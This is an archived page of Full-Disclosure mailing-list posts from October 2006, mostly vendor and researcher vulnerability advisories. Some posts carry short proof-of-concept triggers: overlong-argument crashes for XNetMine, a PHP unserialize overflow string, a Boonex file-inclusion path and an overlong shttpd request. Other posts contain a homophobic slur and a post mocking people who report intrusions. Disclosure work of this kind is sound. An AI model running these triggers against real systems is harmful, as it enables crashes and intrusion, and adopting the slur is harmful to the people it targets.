> Matthew: Just blow away the SEH chain and trigger an INT3.
> Arkon: It will eliminate the string "ExitProcess" and the GetProcAddress
> code for it as well.
> Matthew:
> MOV FS:[0], 0x
> INT3
> Matthew: BAM! :) Instant process death...
> Arkon: This is too long.
> Matthew:
> PUSH 0
> POP FS:[0]
> Arkon: Nah
> Matthew: XOR ESP, ESP might also do the trick :-)
> Arkon: LOL!!!
> Matthew:
> XOR ESP, ESP
> PUSH EAX
> Arkon:
> XCHG EAX, ESP
> PUSH 0
> Arkon: Wait I'm stupid, push 0 is 2 bytes long.
> Arkon:
> XCHG EAX, ESP
> PUSH EAX
> Arkon: 2 bytes ExitProcess OMFG
> Matthew: You're a maniac
>
> Gadi.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] How To Spot A Narq With Ease

2006-10-18 Thread vile
ok guys, this one is really easy. spotting narqz can usually be hard, but I found a great method! 
go to any full-disclosure list, and you'll usually see a bunch of whitehats talking about vulnerabilities. most of these guys are like super hackers, so don't mess with them. however, they are all narqs too! usually anyone who believes in full-disclosure is a possible narq. so do not tell any of these people about how you owned their mom's laptop. they will fucking go CRAZY! CRZYY!!! ROOOAAAR! they will call the local authorities and tell them that you owned their mom's laptop, and the cops will laugh at them. But just so you know, they do actively search for criminalz. just ask some dude if he believes in full-disclosure. if he says yes: NARQ 
[EMAIL PROTECTED]
 
l8r narqz.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ERRATA: [ GLSA 200610-07 ] Python: Buffer Overflow

2006-10-18 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE]         GLSA 200610-07:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Python: Buffer Overflow
      Date: October 17, 2006
   Updated: October 17, 2006
      Bugs: #149065
        ID: 200610-07:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The Resolution proposed in the original version of this Security
Advisory did not properly mention the package name.

The corrected sections appear below.

Resolution
==

All Python users should update to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.3-r4"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



Re: [Full-disclosure] Secunia Research: IBM Lotus Notes Insecure Default Folder Permissions

2006-10-18 Thread Valdis . Kletnieks
On Wed, 18 Oct 2006 17:38:53 +0200, Secunia Research said:
> The problem is that Lotus Notes sets insecure default permissions
> (grants "Everyone" group "Full Control") on the "notes" directory and
> all child objects. This can be exploited to remove, manipulate, and
> replace any of the application's files.

Well... Yeah.  *duh*.  If you want to *collaborate* on stuff, the software
has to be set up so that the collaborating group can still make progress,
even if the actual file owner is a PHB with the IQ of a dill pickle. :)



[Full-disclosure] Secunia Research: IBM Lotus Notes Insecure Default Folder Permissions

2006-10-18 Thread Secunia Research
== 

 Secunia Research 18/10/2006

  - IBM Lotus Notes Insecure Default Folder Permissions -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

IBM Lotus Notes 6.5.4 and 6.5.5.
IBM Lotus Notes 7.0.0 and 7.0.1.

== 
2) Severity 

Rating: Less critical 
Impact: Privilege Escalation, Manipulation of Data
Where:  Local System

== 
3) Vendor's Description of Software 

"IBM Lotus Notes continues to set the standard for innovation in the
messaging and collaboration market Lotus defined over a decade ago.
As an integrated collaborative environment, the Lotus Notes client
and the IBM Lotus Domino server combine enterprise-class messaging
and calendaring & scheduling capabilities with a robust platform for
collaborative applications".

Product Link:
http://www.lotus.com/products/product4.nsf/wdocs/noteshomepage

== 
4) Description of Vulnerability

Secunia Research has discovered a security issue in Lotus Notes,
which can be exploited by malicious, local users to manipulate
arbitrary files.

The problem is that Lotus Notes sets insecure default permissions
(grants "Everyone" group "Full Control") on the "notes" directory and
all child objects. This can be exploited to remove, manipulate, and
replace any of the application's files.

== 
5) Solution 

Update to version 7.0.2.

== 
6) Time Table 

22/07/2005 - Vendor notified.
22/07/2005 - Vendor response.
18/10/2006 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

IBM:
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21246773

The Common Vulnerabilities and Exposures (CVE) project has assigned 
candidate number CVE-2005-2454 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below to
see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-29/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





[Full-disclosure] Secunia Research: Joomla BSQ Sitestats Script Insertion and SQL Injection

2006-10-18 Thread Secunia Research
== 

   Secunia Research 18/10/2006

  - Joomla BSQ Sitestats Script Insertion and SQL Injection -


== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

Joomla BSQ Sitestats 1.8.0 and 2.2.1.

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: Cross Site Scripting, Manipulation of data
Where:  From remote

== 
3) Vendor's Description of Software 

"BSQ Sitestats is a site stats module that is lightweight on the front
end but offers both tabular and graphical summaries of site visitors'
sessions on the backend".

Product Link:
http://developer.joomla.org/sf/projects/bsq_sitestats

== 
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in the BSQ
Sitestats component for Joomla, which can be exploited by malicious
people to conduct script insertion or SQL injection attacks.

1) Input passed via the "HTTP Referer" Header is not properly 
sanitised before being used. This can be exploited to insert arbitrary
HTML and script code, which is executed in an administrative user's
browser session in context of an affected site when the site
statistics are viewed.

2) Input passed via the URI string is not properly sanitised before
being used in SQL queries. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.

Successful exploitation requires that "magic_quotes_gpc" is disabled.

== 
5) Solution 

Update to version 2.2.2.

== 
6) Time Table 

28/09/2006 - Vendor notified.
29/09/2006 - Vendor response.
18/10/2006 - Public disclosure.

== 
7) Credits 

Discovered by Sven Krewitt, Secunia Research.

== 
8) References

None.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below to
see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-65/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





[Full-disclosure] XNetMine (no version) multiple buffer overflow.

2006-10-18 Thread Federico Fazzi





Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz

Vulnerable code:
-- 
line: 672/676

  if (strncmp("-PortNumber",argv[t+1],11)==0)
 { char text[500];
   strcpy(text,argv[t+1]);
   strcpy(Port,&text[11]);
 }
-- 
line: 677/682

 if (strncmp("-Name",argv[t+1],5)==0)
 {
   char text[500];
   strcpy(text,argv[t+1]);
   strcpy(User,&text[5]);
 }
-- 
line: 683/688

  if (strncmp("-ServerName",argv[t+1],11)==0)
 {
   char text[500];
   strcpy(text,argv[t+1]);
   strcpy(ServerName,&text[11]);
 }
-- 

Proof of concept:
-- 
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585  Client:0  PortNum:AAA(...) 
ServerName:"A(...)"
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1  Client:0  PortNum:
Name:"(...)"  ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1  Client:0  PortNum:31337
Name:"31337"  ServerName:"A(...)"
Segmentation fault
-- 

Debug information:
-- 
(gdb) p $eip
$1 = (void (*)()) 0x804a862 
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()

-- federico
[EMAIL PROTECTED] / http://defsol.plugs.it/
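An added example, not part of the advisory and not XNetMine's code: the unbounded strcpy pairs quoted above replaced by one bounded copy that refuses values that do not fit, plus an argv walk that mirrors the original's option loop. OPT_MAX, the function names and the sample command line are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Size of the fixed buffers the values land in. Assumption: the advisory does
 * not give the sizes of Port, User and ServerName in XNetMine. */
#define OPT_MAX 64

enum opt_result { OPT_MATCH = 0, OPT_NOMATCH = 1, OPT_TOOLONG = 2 };

/* Copy the value that follows `prefix` in `arg` into dst[dstsz], refusing any
 * value that would not fit. This replaces the two unbounded copies
 *     strcpy(text, argv[t+1]);  strcpy(Port, &text[11]);
 * where neither text[500] nor the destination can hold an arbitrary argv. */
enum opt_result copy_option_value(const char *arg, const char *prefix,
                                  char *dst, size_t dstsz)
{
    size_t plen = strlen(prefix);
    if (strncmp(prefix, arg, plen) != 0)
        return OPT_NOMATCH;
    const char *value = arg + plen;
    size_t vlen = strlen(value);
    if (vlen >= dstsz) {                // no room for value + NUL: reject, do not truncate silently
        dst[0] = '\0';
        return OPT_TOOLONG;
    }
    memcpy(dst, value, vlen + 1);       // vlen + 1 copies the terminating NUL
    return OPT_MATCH;
}

struct xnm_opts { char port[OPT_MAX]; char user[OPT_MAX]; char server[OPT_MAX]; };

/* Walk argv the way XNetMine's option loop does (one "-Flagvalue" token per
 * argument) and return how many arguments were rejected as too long. */
int parse_xnm_args(int argc, char **argv, struct xnm_opts *o)
{
    int rejected = 0;
    memset(o, 0, sizeof *o);
    for (int t = 1; t < argc; t++) {
        enum opt_result r;
        if ((r = copy_option_value(argv[t], "-PortNumber", o->port, sizeof o->port)) == OPT_NOMATCH &&
            (r = copy_option_value(argv[t], "-ServerName", o->server, sizeof o->server)) == OPT_NOMATCH)
            r = copy_option_value(argv[t], "-Name", o->user, sizeof o->user);
        if (r == OPT_TOOLONG) {
            fprintf(stderr, "rejected over-long value for %.12s...\n", argv[t]);
            rejected++;
        }
    }
    return rejected;
}

/* Constructed command line mirroring the advisory's second PoC: a -Name value
 * of 504 'A's, which the original code strcpy()s into char text[500]. */
int demo_parse(struct xnm_opts *o)
{
    static char big[5 + 504 + 1];
    memcpy(big, "-Name", 5);
    memset(big + 5, 'A', 504);
    big[sizeof big - 1] = '\0';
    char *av[] = { "XNetMine", "-Server", "-PortNumber31337", big, "-ServerNamehost1" };
    return parse_xnm_args(5, av, o);
}

int main(void)
{
    struct xnm_opts o;
    int rejected = demo_parse(&o);
    printf("rejected=%d Port=%s Name=\"%s\" ServerName=%s\n",
           rejected, o.port, o.user, o.server);
    return rejected ? 1 : 0;
}
```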





Re: [Full-disclosure] shttpd long get request vuln ( retro )

2006-10-18 Thread vile
morning wood, you are a complete fucking moron/faggot.
On 10/18/06, Morning Wood <[EMAIL PROTECTED]> wrote:
> see attached retro advisory


Re: [Full-disclosure] speaking of code crunching... (challenge)

2006-10-18 Thread Peter Ferrie
I have 330 bytes, but without encryption.
I could thank the virus writer whose file header I used, but I won't.



[Full-disclosure] Multiple vulnerabilities in Highwall Enterprise and Highwall Endpoint management interface

2006-10-18 Thread noreply
Multiple vulnerabilities in Highwall Enterprise and Highwall Endpoint 4.0.2.11045 management interface


SUMMARY

Highwall Enterprise and Highwall Endpoint wireless IDS management interface 
contain multiple vulnerabilities which can lead to privilege escalation and 
code execution.

DETAILS

The web interface of Highwall Enterprise and Highwall Endpoint does not properly
screen characters in user-supplied input. This can lead to multiple
Cross-Site Scripting and SQL Injection conditions. The vulnerabilities can be
exploited by a malicious system operator to escalate privileges or run code of
his choice in the context of the Microsoft SQL Server back-end database. These
vulnerabilities may also be exploited by an external attacker using an
Access Point with a specially crafted SSID to bypass security restrictions or
escalate privileges.

DISCLOSURE TIMELINE

8 September 2006 - Initial vendor contact, no response received.
September 2006 - Initial vendor contact, no response received.
18 October 2006 - Public disclosure 



Re: [Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update

2006-10-18 Thread Paul Schmehl
Thanks, David, for your always enlightening (and depressing if you use 
Oracle products) reports on the unbreakable database.


--On Wednesday, October 18, 2006 07:55:35 +0100 David Litchfield 
<[EMAIL PROTECTED]> wrote:



> Hey all,
> I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the
> October 2006 Critical Patch Update that was released yesterday:
> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2006.html.
> Further, it's a shame to see that, after a promising July 2006 CPU where
> Oracle had all the patches ready *on time*, they have slipped back into
> their old, bad habits - patches are not ready for a number of platforms. I
> thought they'd solved those issues - but clearly not. You can get a copy of
> the analysis from
> http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf,
> Cheers,
> David Litchfield
> NGSSoftware Ltd
> http://www.ngssoftware.com/
> +44(0) 208 401 0070





Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



Re: [Full-disclosure] Joe Job - to blue pill

2006-10-18 Thread Larry Pesce
William Knowles wrote:

> One time mailings with companies I have no previous business relationships
> I can almost forgive, subscribing me to mailing lists without my permission,
> I can't.

and the e-mails sent to the list do not contain any apparent way to
unsubscribe.  I don't know about any one else, but I did not get a notice
that I was subscribed, or how to unsubscribe.

I'm thinking Joe just self-fulfilled his own prophecy on "tons of mailserver
blacklists by the end of the day today".

So, how about the name of the company that sold you the list, Joe?

- L






[Full-disclosure] Airmagnet management interfaces multiple vulnerabilities

2006-10-18 Thread noreply




Airmagnet management interfaces multiple vulnerabilities

A management interface of AirMagnet Enterprise contains several middle-risk
vulnerabilities. The vulnerabilities range from reflected and stored Cross-Site
Scripting to remote code execution and protection bypass.

Smart Sensor, Edge Sensor

Reflected (non persistent) XSS in 404 error page.
Stored (persistent) XSS in log viewer via user name in failed logon record.

Enterprise Server Web-interface stored XSS

AirMagnet Enterprise Server provides a feature which can be used to check server
status via https (Enterprise Server Status Overview). One of the pages (ACL)
displays the status of monitored APs. The SSID of an AP is echoed to the user's
browser without screening, which can lead to XSS conditions.

AirMagnet Enterprise console and Remote Sensor console (Laptop) XSS

The AirMagnet AirWISE feature provides a detailed description of detected
attacks. The AirMagnet console uses an embedded Internet Explorer object for
displaying information about an intrusion and inserts the SSID of access points
(or the client) into the HTML template without screening.

AirMagnet Enterprise console SSL mitm attack

The AirMagnet Enterprise console doesn't validate the Enterprise Server
certificate, which can be used by an attacker who can realize a mitm condition
between Server and Console to decrypt traffic and sniff administrator and
sensor passwords.

DISCLOSURE TIMELINE

May - September 2006 - Attempts to contact vendor without intelligible response.
18 October 2006 - Public disclosure

Re: [Full-disclosure] PHP 5 ecalloc memory manager unserialize() array int overflow ia 32 bits poc

2006-10-18 Thread Slythers Bro
"ia 32 bits poc"
poc = Proof Of Concept

On 10/18/06, Josh Bressers <[EMAIL PROTECTED]> wrote:
> >
> > print_r(unserialize('a:1073741823:{i:0;s:30:"aa"}'));
> > ?>
> >
> > in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow
> > here segfault in zend_hash_find() but it's possible to fake the bucket and
> > exploit a zend_hash_del_index_or_key
> > i tried a memory dump , just fake the bucked with the pointer of the
> > $GLOBALS's bucket but segfault before in memory_shutdown...
>
> This looks to be CVE-2006-4812, which was discovered by Stefan Esser.  He
> published his advisory last week:
>
> http://www.hardened-php.net/advisory_092006.133.html
>
> --
> JB

[Full-disclosure] Boonex Dolphin 5.2 Remote File Inclusion

2006-10-18 Thread disfigure
//

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Boonex Dolphin 5.2
http://www.boonex.com/products/dolphin/

VULNERABILITY:
Remote File Inclusion

NOTES:
- requires register globals on
- requires magic quotes off

POC:
//templates/tmpl_dfl/scripts/index.php?dir[inc]=

ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1490

//



Re: [Full-disclosure] Comdev One Admin 4.1 Remote File Inclusion

2006-10-18 Thread Knud Erik Højgaard
> - requires register globals on
> - requires magic quotes off

Seriously, who gives a shit then? And who gives a rats ass about file
inclusion in a crappy php script run only by you, your sister and the
author? It's as useful as buffer overflows in non-suid binaries, akin
to releasing advisories stating
- requires user to download and execute binary
- requires blank administrator password
- requires chmod +s /bin/*

> ADVISORY & EXPLOIT (requires registration):
> http://w4ck1ng.com/board/showthread.php?t=1491

BLA BLA HOW TO FIND BUGS LIKE THIS (requires lack of dayjob, desire
for 'fame'): wget -m crappy-php-coders.com/stupid-scripts ;  egrep -r
'include\(\$|require\(\$' . |
bugtraq-mailer-including-selfpromotion-crap

--
lol @ security 'industry', it's like printing ones own monies!!"3



Re: [Full-disclosure] Vuln ....

2006-10-18 Thread wac
Thanks. But don´t worry I won´t read sh... anyway :) Nothing interesting could come from that hitman anyway.
Regards
WAC

On 10/16/06, Pink Hat <[EMAIL PROTECTED]> wrote:
> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
> > Hey you could start by writing those sites in english :P
>
> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
> Not perfect but readable... I guess...

[Full-disclosure] [MU-200610-01] Denial of Service in XORP OSPFv2

2006-10-18 Thread noreply
Denial of Service in XORP OSPFv2 [MU-200610-01]
October 17, 2006

http://labs.musecurity.com/advisories.html

Affected Product/Versions:

XORP OSPFv2 1.2, 1.3

Product Overview:

"XORP is the eXtensible Open Router Platform.

Our goal is to develop an open source software router platform that is stable
and fully featured enough for production use, and flexible and extensible enough
to enable network research. Currently XORP implements routing protocols for IPv4
and IPv6 and a unified means to configure them."

Vulnerability Details:

OSPF carries link state information using Link State Advertisements.  Each
LSA contains a length field as well as a checksum.

XORP performs a checksum verification when processing an LSA.  During the
checksum verification, the length field is used to calculate the payload.
An invalid length field causes an out of bounds read, causing the OSPF daemon
to crash.

Vendor Response / Solution:

Apply the relevant patch to your XORP system and follow vendor instructions.

[XORP 1.2]
# wget http://www.xorp.org/patches/SA-06:01/xorp_sa_06:01.ospf_1.2.patch

[XORP 1.3]
# wget http://www.xorp.org/patches/SA-06:01/xorp_sa_06:01.ospf_1.3.patch

Mu Security would like to thank XORP for timely remediation of this
vulnerability.

History:

10/13/06 - First contact with vendor
10/16/06 - Patch available
10/17/06 - Advisory released

Credit:

This vulnerability was discovered by the Mu Security research team.

http://labs.musecurity.com/pgpkey.txt

Mu Security offers a new class of security analysis system, delivering a
rigorous and streamlined methodology for verifying the robustness and security
readiness of any IP-based product or application. Founded by the pioneers of
intrusion detection and prevention technology, Mu Security is backed by
preeminent venture capital firms that include Accel Partners, Benchmark
Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For
more information, visit the company's website at http://www.musecurity.com.
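An added example, not XORP's code and not part of the Mu Security advisory: an OSPFv2 LSA validator in C that bounds the header's length field by the number of bytes actually received before that field drives the Fletcher checksum loop, which is the check whose absence the advisory describes. The header layout (LS checksum at offset 16, length at offset 18) is from RFC 2328; the sample Router-LSA, its addresses and all function names are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* OSPFv2 LSA header (RFC 2328 A.4.1): 20 bytes, LS checksum at offset 16 and
 * length at offset 18, both big-endian. The Fletcher checksum covers the whole
 * LSA except the 2-byte LS age field. */
#define LSA_HDR_LEN   20
#define LSA_CKSUM_OFF 16
#define LSA_LEN_OFF   18

enum lsa_status { LSA_OK = 0, LSA_TRUNCATED, LSA_BAD_LENGTH, LSA_BAD_CHECKSUM };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Running Fletcher sums (mod 255) over buf[2..len), i.e. everything but LS age. */
static void fletcher_sums(const uint8_t *buf, size_t len, uint32_t *c0, uint32_t *c1)
{
    uint32_t a = 0, b = 0;
    for (size_t i = 2; i < len; i++) { a = (a + buf[i]) % 255; b = (b + a) % 255; }
    *c0 = a;
    *c1 = b;
}

/* Validate one LSA at the start of a buffer holding `avail` received bytes.
 * The length field is bounded by `avail` before it drives the checksum loop;
 * without that bound a bogus length walks the read past the end of the packet. */
enum lsa_status lsa_validate(const uint8_t *buf, size_t avail, uint16_t *lsa_len)
{
    uint32_t c0, c1;
    if (avail < LSA_HDR_LEN)
        return LSA_TRUNCATED;           // not even a full header was received
    uint16_t len = rd16(buf + LSA_LEN_OFF);
    if (len < LSA_HDR_LEN || len > avail)
        return LSA_BAD_LENGTH;          // peer-controlled field: reject before use
    fletcher_sums(buf, len, &c0, &c1);  // safe: len <= avail
    if (c0 != 0 || c1 != 0)
        return LSA_BAD_CHECKSUM;
    if (lsa_len) *lsa_len = len;
    return LSA_OK;
}

/* Generator side: place the two checksum bytes so that the sums come out zero
 * (the Fletcher placement formula of RFC 905 Annex B, which RFC 2328 cites). */
void lsa_stamp_checksum(uint8_t *buf, size_t len)
{
    uint32_t c0, c1;
    buf[LSA_CKSUM_OFF] = buf[LSA_CKSUM_OFF + 1] = 0;
    fletcher_sums(buf, len, &c0, &c1);
    long n = (long)len - 2, off = LSA_CKSUM_OFF - 2;   // covered bytes, checksum position in them
    int x = (int)(((n - off - 1) * (long)c0 - (long)c1) % 255);
    if (x <= 0) x += 255;
    int y = 510 - (int)c0 - x;
    if (y > 255) y -= 255;
    buf[LSA_CKSUM_OFF] = (uint8_t)x;
    buf[LSA_CKSUM_OFF + 1] = (uint8_t)y;
}

/* Constructed sample: a minimal Router-LSA (type 1) with no links, 24 bytes,
 * stamped with a valid checksum. Returns the LSA length. */
size_t build_sample_lsa(uint8_t out[24])
{
    static const uint8_t tmpl[24] = {
        0x00, 0x00,             // LS age
        0x02, 0x01,             // options (E bit), LS type 1 = Router-LSA
        0x0a, 0x00, 0x00, 0x01, // Link State ID 10.0.0.1 (constructed)
        0x0a, 0x00, 0x00, 0x01, // Advertising Router 10.0.0.1 (constructed)
        0x80, 0x00, 0x00, 0x01, // LS sequence number
        0x00, 0x00,             // LS checksum, filled in by lsa_stamp_checksum()
        0x00, 0x18,             // length = 24
        0x00, 0x00, 0x00, 0x00  // body: flags, reserved, # links = 0
    };
    memcpy(out, tmpl, sizeof tmpl);
    lsa_stamp_checksum(out, sizeof tmpl);
    return sizeof tmpl;
}
```

With the length bound in place, an LSA that claims 256 bytes while only 24 arrived is rejected as LSA_BAD_LENGTH before any byte beyond the packet is touched.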



[Full-disclosure] shttpd long get request vuln ( retro )

2006-10-18 Thread Morning Wood

see attached retro advisory

  - EXPL-A-2006-005 exploitlabs.com Retro Advisory 002 -

 - SHTTPD -







AFFECTED PRODUCTS
=
SHTTPD < v1.34
http://shttpd.sourceforge.net/



OVERVIEW

"SHTTPD is a lightweight web server. The main design
goals are the ease of use  and the ability to embed.
Ideal for personal use, web-based software demos 
(like PHP, Perl etc), quick file sharing.

A care has been taken to make the code secure"



RETRO-RELEASE DATE:
===
Oct 10, 2005

Duplicate Release: Oct 06, 2006 
by: sk0de

http://secunia.com/advisories/22294/



DETAILS
===
SHTTPD is vulnerable to an overly long GET request.



SOLUTION

patch: Upgrade to v1.35



PROOF OF CONCEPT

1.start SHTTPD

2.send an overly long GET request

http://[host]/Ax274 chars ( v1.27 - v1.30 )
http://[host]/Ax256 chars ( v1.34 )
v1.31-v1.33 untested

2a.
PoC by Sk0de
http://www.milw0rm.com/exploits/2482



CREDITS
===
"sk0de - http://secunia.com/advisories/22294/ "



RETRO-CREDITS
=
This vulnerability was discovered and researched by 
Donnie Werner of Exploitlabs. At the original time

of discovery and retro-release date, the author was
not aware of any other advisories or research by 3rd parties.


Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web:http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txt

[Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update

2006-10-18 Thread David Litchfield
Hey all,
I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the 
October 2006 Critical Patch Update that was released yesterday: 
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2006.html.
 
Further, it's a shame to see that, after a promising July 2006 CPU where 
Oracle had all the patches ready *on time*, they have slipped back into 
their old, bad habits - patches are not ready for a number of platforms. I 
thought they'd solved those issues - but clearly not. You can get a copy of 
the analysis from 
http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf,
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
+44(0) 208 401 0070



